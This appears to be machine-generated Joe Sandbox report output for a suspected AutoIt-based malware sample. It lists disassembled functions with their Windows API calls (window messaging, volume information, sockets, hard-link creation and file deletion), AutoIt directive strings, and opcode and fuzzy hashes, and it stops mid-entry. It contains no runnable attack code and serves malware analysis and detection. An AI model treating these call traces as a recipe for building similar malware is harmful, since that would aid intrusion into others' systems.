                                                                                  • Source File: 00000000.00000002.1707525489.00000000001C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 001C0000, based on PE: true
                                                                                  • Associated: 00000000.00000002.1707507005.00000000001C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.1707581381.000000000025C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.1707581381.0000000000282000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.1707624423.000000000028C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.1707641887.0000000000294000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_0_2_1c0000_K3xL5Xy0XS.jbxd
                                                                                  Similarity
                                                                                  • API ID: MessageSend$DestroyWindow
                                                                                  • String ID: msctls_updown32
                                                                                  • API String ID: 4014797782-2298589950
                                                                                  • Opcode ID: 4a0e2bb12ccec251e501ac3a1a5801d9de072ddd7141576b537bd3b6358ef48b
                                                                                  • Instruction ID: ce9ec21a5d394df676378c1edc21acac2d4358c1eb9894e838f0a4b0175acbd5
                                                                                  • Opcode Fuzzy Hash: 4a0e2bb12ccec251e501ac3a1a5801d9de072ddd7141576b537bd3b6358ef48b
                                                                                  • Instruction Fuzzy Hash: 0221A1B5610209AFEB11EF64DCC5DB777ADEF5A399B100049FA009B291CB70EC65CB64
                                                                                  APIs
                                                                                  Strings
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000000.00000002.1707525489.00000000001C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 001C0000, based on PE: true
                                                                                  • Associated: 00000000.00000002.1707507005.00000000001C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.1707581381.000000000025C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.1707581381.0000000000282000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.1707624423.000000000028C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.1707641887.0000000000294000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_0_2_1c0000_K3xL5Xy0XS.jbxd
                                                                                  Similarity
                                                                                  • API ID: _wcslen
                                                                                  • String ID: #OnAutoItStartRegister$#notrayicon$#requireadmin
                                                                                  • API String ID: 176396367-2734436370
                                                                                  • Opcode ID: efae928b2969bd990545a3857242771e616e94ec601f8cc0b59d50a1f6947587
                                                                                  • Instruction ID: a05b9f8b127fa605048a1ff9cb3b09d6b1172181ef593de660600379bb653a22
                                                                                  • Opcode Fuzzy Hash: efae928b2969bd990545a3857242771e616e94ec601f8cc0b59d50a1f6947587
                                                                                  • Instruction Fuzzy Hash: 4D21383222463276D331AE69AC02FBB73DC9F75300F50402AFA4997181EBA19DB6C295
                                                                                  APIs
                                                                                  • SendMessageW.USER32(00000000,00000180,00000000,?), ref: 00253840
                                                                                  • SendMessageW.USER32(?,00000186,00000000,00000000), ref: 00253850
                                                                                  • MoveWindow.USER32(00000000,?,?,?,?,00000000,?,?,Listbox,00000000,00000000,?,?,?,?,?), ref: 00253876
                                                                                  Strings
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000000.00000002.1707525489.00000000001C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 001C0000, based on PE: true
                                                                                  • Associated: 00000000.00000002.1707507005.00000000001C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.1707581381.000000000025C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.1707581381.0000000000282000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.1707624423.000000000028C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.1707641887.0000000000294000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_0_2_1c0000_K3xL5Xy0XS.jbxd
                                                                                  Similarity
                                                                                  • API ID: MessageSend$MoveWindow
                                                                                  • String ID: Listbox
                                                                                  • API String ID: 3315199576-2633736733
                                                                                  • Opcode ID: ed0a193b82d4c53d7b7fb6755f38439ab87ba90afbf7e51d153958815f65ed31
                                                                                  • Instruction ID: 13bc4acc658b18b005559a822cb0e73cccad286fb47c0d77a88b435374afc945
                                                                                  • Opcode Fuzzy Hash: ed0a193b82d4c53d7b7fb6755f38439ab87ba90afbf7e51d153958815f65ed31
                                                                                  • Instruction Fuzzy Hash: 6721F272620219BBEF11CF64DC44FBB376EEF89791F109114F9009B190C671DC228BA4
                                                                                  APIs
                                                                                  • SetErrorMode.KERNEL32(00000001), ref: 00234A08
                                                                                  • GetVolumeInformationW.KERNEL32(?,?,00007FFF,?,00000000,00000000,00000000,00000000), ref: 00234A5C
                                                                                  • SetErrorMode.KERNEL32(00000000,?,?,0025CC08), ref: 00234AD0
                                                                                  Strings
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000000.00000002.1707525489.00000000001C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 001C0000, based on PE: true
                                                                                  • Associated: 00000000.00000002.1707507005.00000000001C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.1707581381.000000000025C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.1707581381.0000000000282000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.1707624423.000000000028C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.1707641887.0000000000294000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_0_2_1c0000_K3xL5Xy0XS.jbxd
                                                                                  Similarity
                                                                                  • API ID: ErrorMode$InformationVolume
                                                                                  • String ID: %lu
                                                                                  • API String ID: 2507767853-685833217
                                                                                  • Opcode ID: 086134984f952e7994d422dc4f136a5ee000f11183c94180b6ac52cb53f95805
                                                                                  • Instruction ID: 6b4e6d2d6df0c92a2f62abcea70bd248d7a1c361888390decccfdc1ae1c2e617
                                                                                  • Opcode Fuzzy Hash: 086134984f952e7994d422dc4f136a5ee000f11183c94180b6ac52cb53f95805
                                                                                  • Instruction Fuzzy Hash: C4315175A00209AFDB10DF54C885EAA7BF8EF09308F1480A9F909DB352D771EE55CBA1
                                                                                  APIs
                                                                                  • SendMessageW.USER32(00000000,00000405,00000000,00000000), ref: 0025424F
                                                                                  • SendMessageW.USER32(?,00000406,00000000,00640000), ref: 00254264
                                                                                  • SendMessageW.USER32(?,00000414,0000000A,00000000), ref: 00254271
                                                                                  Strings
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000000.00000002.1707525489.00000000001C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 001C0000, based on PE: true
                                                                                  • Associated: 00000000.00000002.1707507005.00000000001C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.1707581381.000000000025C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.1707581381.0000000000282000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.1707624423.000000000028C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.1707641887.0000000000294000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_0_2_1c0000_K3xL5Xy0XS.jbxd
                                                                                  Similarity
                                                                                  • API ID: MessageSend
                                                                                  • String ID: msctls_trackbar32
                                                                                  • API String ID: 3850602802-1010561917
                                                                                  • Opcode ID: 1e252ee05f7fada45bb7afe7b853188e13ca09d10f2b64021ae2bf6208caae1d
                                                                                  • Instruction ID: 24ec9d2cfecff84dc380910ec906185028d6c013e32a59c94855cfe5331c6e3d
                                                                                  • Opcode Fuzzy Hash: 1e252ee05f7fada45bb7afe7b853188e13ca09d10f2b64021ae2bf6208caae1d
                                                                                  • Instruction Fuzzy Hash: A5110631250309BEEF206F29CC06FAB7BACEF95B69F114114FE55E2090D2B1DC619B24
                                                                                  APIs
                                                                                    • Part of subcall function 001C6B57: _wcslen.LIBCMT ref: 001C6B6A
                                                                                    • Part of subcall function 00222DA7: SendMessageTimeoutW.USER32(?,00000000,00000000,00000000,00000002,00001388,?), ref: 00222DC5
                                                                                    • Part of subcall function 00222DA7: GetWindowThreadProcessId.USER32(?,00000000), ref: 00222DD6
                                                                                    • Part of subcall function 00222DA7: GetCurrentThreadId.KERNEL32 ref: 00222DDD
                                                                                    • Part of subcall function 00222DA7: AttachThreadInput.USER32(00000000,?,00000000,00000000), ref: 00222DE4
                                                                                  • GetFocus.USER32 ref: 00222F78
                                                                                    • Part of subcall function 00222DEE: GetParent.USER32(00000000), ref: 00222DF9
                                                                                  • GetClassNameW.USER32(?,?,00000100), ref: 00222FC3
                                                                                  • EnumChildWindows.USER32(?,0022303B), ref: 00222FEB
                                                                                  Strings
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000000.00000002.1707525489.00000000001C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 001C0000, based on PE: true
                                                                                  • Associated: 00000000.00000002.1707507005.00000000001C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.1707581381.000000000025C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.1707581381.0000000000282000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.1707624423.000000000028C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.1707641887.0000000000294000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_0_2_1c0000_K3xL5Xy0XS.jbxd
                                                                                  Similarity
                                                                                  • API ID: Thread$AttachChildClassCurrentEnumFocusInputMessageNameParentProcessSendTimeoutWindowWindows_wcslen
                                                                                  • String ID: %s%d
                                                                                  • API String ID: 1272988791-1110647743
                                                                                  • Opcode ID: f88e95663e754e330346ff6f5031c88e7546733554bb56acf4a444faf6a1b356
                                                                                  • Instruction ID: 91b22fdd4b5866e3789acf07d6e9cafaebab0fea0f4fa8019585a2ff8734f7e6
                                                                                  • Opcode Fuzzy Hash: f88e95663e754e330346ff6f5031c88e7546733554bb56acf4a444faf6a1b356
                                                                                  • Instruction Fuzzy Hash: 0D11C071210215BBCF00BFA0AC95FED37AAAF94304F044079B9099B292DE759A598B70
                                                                                  APIs
                                                                                  • GetMenuItemInfoW.USER32(?,?,?,00000030), ref: 002558C1
                                                                                  • SetMenuItemInfoW.USER32(?,?,?,00000030), ref: 002558EE
                                                                                  • DrawMenuBar.USER32(?), ref: 002558FD
                                                                                  Strings
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000000.00000002.1707525489.00000000001C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 001C0000, based on PE: true
                                                                                  • Associated: 00000000.00000002.1707507005.00000000001C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.1707581381.000000000025C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.1707581381.0000000000282000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.1707624423.000000000028C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.1707641887.0000000000294000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_0_2_1c0000_K3xL5Xy0XS.jbxd
                                                                                  Similarity
                                                                                  • API ID: Menu$InfoItem$Draw
                                                                                  • String ID: 0
                                                                                  • API String ID: 3227129158-4108050209
                                                                                  • Opcode ID: 166a8b1d11ed39f88c32fa0f4a7f4bac38d40a8ab16f55a0baaa3edf6837afe1
                                                                                  • Instruction ID: ee1486b764442c0e3cb247e3e3f3c57f8c05a731549203b3ee62b8b1964d3b4b
                                                                                  • Opcode Fuzzy Hash: 166a8b1d11ed39f88c32fa0f4a7f4bac38d40a8ab16f55a0baaa3edf6837afe1
                                                                                  • Instruction Fuzzy Hash: D901C431510228EFDB109F51DC44BAEBBB4FF45362F108099E849D6261EB308A94DF64
                                                                                  APIs
                                                                                  • GetProcAddress.KERNEL32(?,GetSystemWow64DirectoryW), ref: 0021D3BF
                                                                                  • FreeLibrary.KERNEL32 ref: 0021D3E5
                                                                                  Strings
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000000.00000002.1707525489.00000000001C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 001C0000, based on PE: true
                                                                                  • Associated: 00000000.00000002.1707507005.00000000001C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.1707581381.000000000025C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.1707581381.0000000000282000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.1707624423.000000000028C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.1707641887.0000000000294000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_0_2_1c0000_K3xL5Xy0XS.jbxd
                                                                                  Similarity
                                                                                  • API ID: AddressFreeLibraryProc
                                                                                  • String ID: GetSystemWow64DirectoryW$X64
                                                                                  • API String ID: 3013587201-2590602151
                                                                                  • Opcode ID: bbf9dfa26396d302cfa5634827f5c0cc0c72cd462005b4e58a2e485df093ad5d
                                                                                  • Instruction ID: 21a817e4a4e08412511ca121d2e73da5212fa7f2493ee7cc143ebd1646439ca9
                                                                                  • Opcode Fuzzy Hash: bbf9dfa26396d302cfa5634827f5c0cc0c72cd462005b4e58a2e485df093ad5d
                                                                                  • Instruction Fuzzy Hash: E8F0EC75435B22DAD7385E108C889E93398AF31701B64859AF437E1095EBB0C9E1CA56
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000000.00000002.1707525489.00000000001C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 001C0000, based on PE: true
                                                                                  • Associated: 00000000.00000002.1707507005.00000000001C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.1707581381.000000000025C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.1707581381.0000000000282000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.1707624423.000000000028C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.1707641887.0000000000294000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_0_2_1c0000_K3xL5Xy0XS.jbxd
                                                                                  Similarity
                                                                                  • API ID:
                                                                                  • String ID:
                                                                                  • API String ID:
                                                                                  • Opcode ID: de12cdfc49ea1d8b74b74f7f208124742cc1925f2f34b145092f5cdc29bfae1f
                                                                                  • Instruction ID: 0f9d54ba5a4437846633783b01076624d6c854bd9e404780692f55ceb76ad92e
                                                                                  • Opcode Fuzzy Hash: de12cdfc49ea1d8b74b74f7f208124742cc1925f2f34b145092f5cdc29bfae1f
                                                                                  • Instruction Fuzzy Hash: 70C17C75A1021AEFDB14CFD4D894AAEB7B5FF48304F208599E805EB252D770ED91CB90
                                                                                  APIs
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000000.00000002.1707525489.00000000001C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 001C0000, based on PE: true
                                                                                  • Associated: 00000000.00000002.1707507005.00000000001C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.1707581381.000000000025C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.1707581381.0000000000282000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.1707624423.000000000028C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.1707641887.0000000000294000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_0_2_1c0000_K3xL5Xy0XS.jbxd
                                                                                  Similarity
                                                                                  • API ID: Variant$ClearInitInitializeUninitialize
                                                                                  • String ID:
                                                                                  • API String ID: 1998397398-0
                                                                                  • Opcode ID: 292ed7ebd49fd4fbaa5cacf9dcae75b6701dbef1db9a613330b298edd63b48ea
                                                                                  • Instruction ID: ab0ab75b7d164ece447ca806517b1e04e54748949d7b4f266f19b8d3b7cb477d
                                                                                  • Opcode Fuzzy Hash: 292ed7ebd49fd4fbaa5cacf9dcae75b6701dbef1db9a613330b298edd63b48ea
                                                                                  • Instruction Fuzzy Hash: 64A125756143019FCB04DF68C485E2AB7E5EF98714F04885DF98A9B3A2DB70EE11CB91
                                                                                  APIs
                                                                                  • ProgIDFromCLSID.OLE32(?,00000000,?,00000000,00000800,00000000,?,0025FC08,?), ref: 002205F0
                                                                                  • CoTaskMemFree.OLE32(00000000,00000000,?,00000000,00000800,00000000,?,0025FC08,?), ref: 00220608
                                                                                  • CLSIDFromProgID.OLE32(?,?,00000000,0025CC40,000000FF,?,00000000,00000800,00000000,?,0025FC08,?), ref: 0022062D
                                                                                  • _memcmp.LIBVCRUNTIME ref: 0022064E
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000000.00000002.1707525489.00000000001C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 001C0000, based on PE: true
                                                                                  • Associated: 00000000.00000002.1707507005.00000000001C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.1707581381.000000000025C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.1707581381.0000000000282000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.1707624423.000000000028C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.1707641887.0000000000294000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_0_2_1c0000_K3xL5Xy0XS.jbxd
                                                                                  Similarity
                                                                                  • API ID: FromProg$FreeTask_memcmp
                                                                                  • String ID:
                                                                                  • API String ID: 314563124-0
                                                                                  • Opcode ID: 4128a2b311f50823aafc4270f96526e78fd998037efb84203a3c459e833991f7
                                                                                  • Instruction ID: 95d9b2bc586582bfdff4db080e6091f154fdf31d11f12bf453fa9781ff7bef5e
                                                                                  • Opcode Fuzzy Hash: 4128a2b311f50823aafc4270f96526e78fd998037efb84203a3c459e833991f7
                                                                                  • Instruction Fuzzy Hash: 07814F71A1011AEFCB04DFD4C988EEEB7B9FF89315F204158E506AB251DB71AE16CB60
                                                                                  APIs
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000000.00000002.1707525489.00000000001C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 001C0000, based on PE: true
                                                                                  • Associated: 00000000.00000002.1707507005.00000000001C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.1707581381.000000000025C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.1707581381.0000000000282000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.1707624423.000000000028C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.1707641887.0000000000294000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_0_2_1c0000_K3xL5Xy0XS.jbxd
                                                                                  Similarity
                                                                                  • API ID: _free
                                                                                  • String ID:
                                                                                  • API String ID: 269201875-0
                                                                                  • Opcode ID: 1d5052e9e730004d5eae9aa761af1c6ab3ba76e969625ea67e1287053ac6cb80
                                                                                  • Instruction ID: aebf0eb8ed95dc5fa7bd3647fac7ec66d19c4e1bfc757bb208d8dc93323a241b
                                                                                  • Opcode Fuzzy Hash: 1d5052e9e730004d5eae9aa761af1c6ab3ba76e969625ea67e1287053ac6cb80
                                                                                  • Instruction Fuzzy Hash: 18416C31620706ABDB217FF99C46ABE3AA4FF61330F140265F918D71E3E77488715261
                                                                                  APIs
                                                                                  • GetWindowRect.USER32(014EEFC8,?), ref: 002562E2
                                                                                  • ScreenToClient.USER32(?,?), ref: 00256315
                                                                                  • MoveWindow.USER32(?,?,?,?,000000FF,00000001,?,?,?,?,?), ref: 00256382
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000000.00000002.1707525489.00000000001C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 001C0000, based on PE: true
                                                                                  • Associated: 00000000.00000002.1707507005.00000000001C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.1707581381.000000000025C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.1707581381.0000000000282000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.1707624423.000000000028C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.1707641887.0000000000294000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_0_2_1c0000_K3xL5Xy0XS.jbxd
                                                                                  Similarity
                                                                                  • API ID: Window$ClientMoveRectScreen
                                                                                  • String ID:
                                                                                  • API String ID: 3880355969-0
                                                                                  • Opcode ID: 4476764ba34457bd6059d80a3cf89901888b0f66d8cff239e98d9db741abb038
                                                                                  • Instruction ID: 508f39a9575873b35d601327711ae7e8b73b4bd848aa63ac1d3da2baeea26326
                                                                                  • Opcode Fuzzy Hash: 4476764ba34457bd6059d80a3cf89901888b0f66d8cff239e98d9db741abb038
                                                                                  • Instruction Fuzzy Hash: 54515C70A1020AEFDF10CF54D888AAE7BB5EF45761F508199FC159B2A0D730EDA5CB54
                                                                                  APIs
                                                                                  • socket.WSOCK32(00000002,00000002,00000011), ref: 00241AFD
                                                                                  • WSAGetLastError.WSOCK32 ref: 00241B0B
                                                                                  • #21.WSOCK32(?,0000FFFF,00000020,00000002,00000004), ref: 00241B8A
                                                                                  • WSAGetLastError.WSOCK32 ref: 00241B94
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000000.00000002.1707525489.00000000001C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 001C0000, based on PE: true
                                                                                  • Associated: 00000000.00000002.1707507005.00000000001C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.1707581381.000000000025C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.1707581381.0000000000282000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.1707624423.000000000028C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.1707641887.0000000000294000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_0_2_1c0000_K3xL5Xy0XS.jbxd
                                                                                  Similarity
                                                                                  • API ID: ErrorLast$socket
                                                                                  • String ID:
                                                                                  • API String ID: 1881357543-0
                                                                                  • Opcode ID: 9c69aa9eab832b15967b6b9eb9c9cb803a11ad4a506468957548d727e6449a99
                                                                                  • Instruction ID: ba2ff9651a12b33346457b2f50d1ee7c937d2beb7de05af2f851ac3c689e3142
                                                                                  • Opcode Fuzzy Hash: 9c69aa9eab832b15967b6b9eb9c9cb803a11ad4a506468957548d727e6449a99
                                                                                  • Instruction Fuzzy Hash: 8C41B135600300AFE724AF24D88AF2977E5EB58718F54844CF91A9F7D2E772DD928B90
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000000.00000002.1707525489.00000000001C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 001C0000, based on PE: true
                                                                                  • Associated: 00000000.00000002.1707507005.00000000001C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.1707581381.000000000025C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.1707581381.0000000000282000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.1707624423.000000000028C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.1707641887.0000000000294000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_0_2_1c0000_K3xL5Xy0XS.jbxd
                                                                                  Similarity
                                                                                  • API ID:
                                                                                  • String ID:
                                                                                  • API String ID:
                                                                                  • Opcode ID: 0735ed80820c565e2c104c8d98bf75afe1e216f8d4a0e4a8eed6e05333b7ca99
                                                                                  • Instruction ID: 40d20c458fb172a7edb40738a579bc071c6815807fbf0ca92e2c494435b39398
                                                                                  • Opcode Fuzzy Hash: 0735ed80820c565e2c104c8d98bf75afe1e216f8d4a0e4a8eed6e05333b7ca99
                                                                                  • Instruction Fuzzy Hash: 21410875A04708AFD724AF38CC81B7EBBA9EB94710F10452EF652DB6D2D771A9118B80
                                                                                  APIs
                                                                                  • CreateHardLinkW.KERNEL32(00000002,?,00000000), ref: 00235783
                                                                                  • GetLastError.KERNEL32(?,00000000), ref: 002357A9
                                                                                  • DeleteFileW.KERNEL32(00000002,?,00000000), ref: 002357CE
                                                                                  • CreateHardLinkW.KERNEL32(00000002,?,00000000,?,00000000), ref: 002357FA
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000000.00000002.1707525489.00000000001C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 001C0000, based on PE: true
                                                                                  • Associated: 00000000.00000002.1707507005.00000000001C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.1707581381.000000000025C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.1707581381.0000000000282000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.1707624423.000000000028C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.1707641887.0000000000294000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_0_2_1c0000_K3xL5Xy0XS.jbxd
                                                                                  Similarity
                                                                                  • API ID: CreateHardLink$DeleteErrorFileLast
                                                                                  • String ID:
                                                                                  • API String ID: 3321077145-0
                                                                                  • Opcode ID: a095d468f2915cbea509f6c46dee66497b5ebd21c67a28f00ac637ee3664cd32
                                                                                  • Instruction ID: 59662eb461f6d2142e0684c4842549e35f131f8a09a403c02fe7dac5990b537e
                                                                                  • Opcode Fuzzy Hash: a095d468f2915cbea509f6c46dee66497b5ebd21c67a28f00ac637ee3664cd32
                                                                                  • Instruction Fuzzy Hash: 54413D35610611DFCB11DF55D445A1EBBE2EFA9320F198488E84AAB362CB70FD41DF91
                                                                                  APIs
                                                                                  • MultiByteToWideChar.KERNEL32(?,00000000,8BE85006,001E6D71,00000000,00000000,001E82D9,?,001E82D9,?,00000001,001E6D71,8BE85006,00000001,001E82D9,001E82D9), ref: 001FD910
                                                                                  • MultiByteToWideChar.KERNEL32(?,00000001,?,?,00000000,?), ref: 001FD999
                                                                                  • GetStringTypeW.KERNEL32(?,00000000,00000000,?), ref: 001FD9AB
                                                                                  • __freea.LIBCMT ref: 001FD9B4
                                                                                    • Part of subcall function 001F3820: RtlAllocateHeap.NTDLL(00000000,?,00291444,?,001DFDF5,?,?,001CA976,00000010,00291440,001C13FC,?,001C13C6,?,001C1129), ref: 001F3852
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000000.00000002.1707525489.00000000001C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 001C0000, based on PE: true
                                                                                  • Associated: 00000000.00000002.1707507005.00000000001C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.1707581381.000000000025C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.1707581381.0000000000282000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.1707624423.000000000028C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.1707641887.0000000000294000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_0_2_1c0000_K3xL5Xy0XS.jbxd
                                                                                  Similarity
                                                                                  • API ID: ByteCharMultiWide$AllocateHeapStringType__freea
                                                                                  • String ID:
                                                                                  • API String ID: 2652629310-0
                                                                                  • Opcode ID: 9e63056fd37bd0b50c642aa7075db0f14658aa17b731daeb2a8225c8f3555fcd
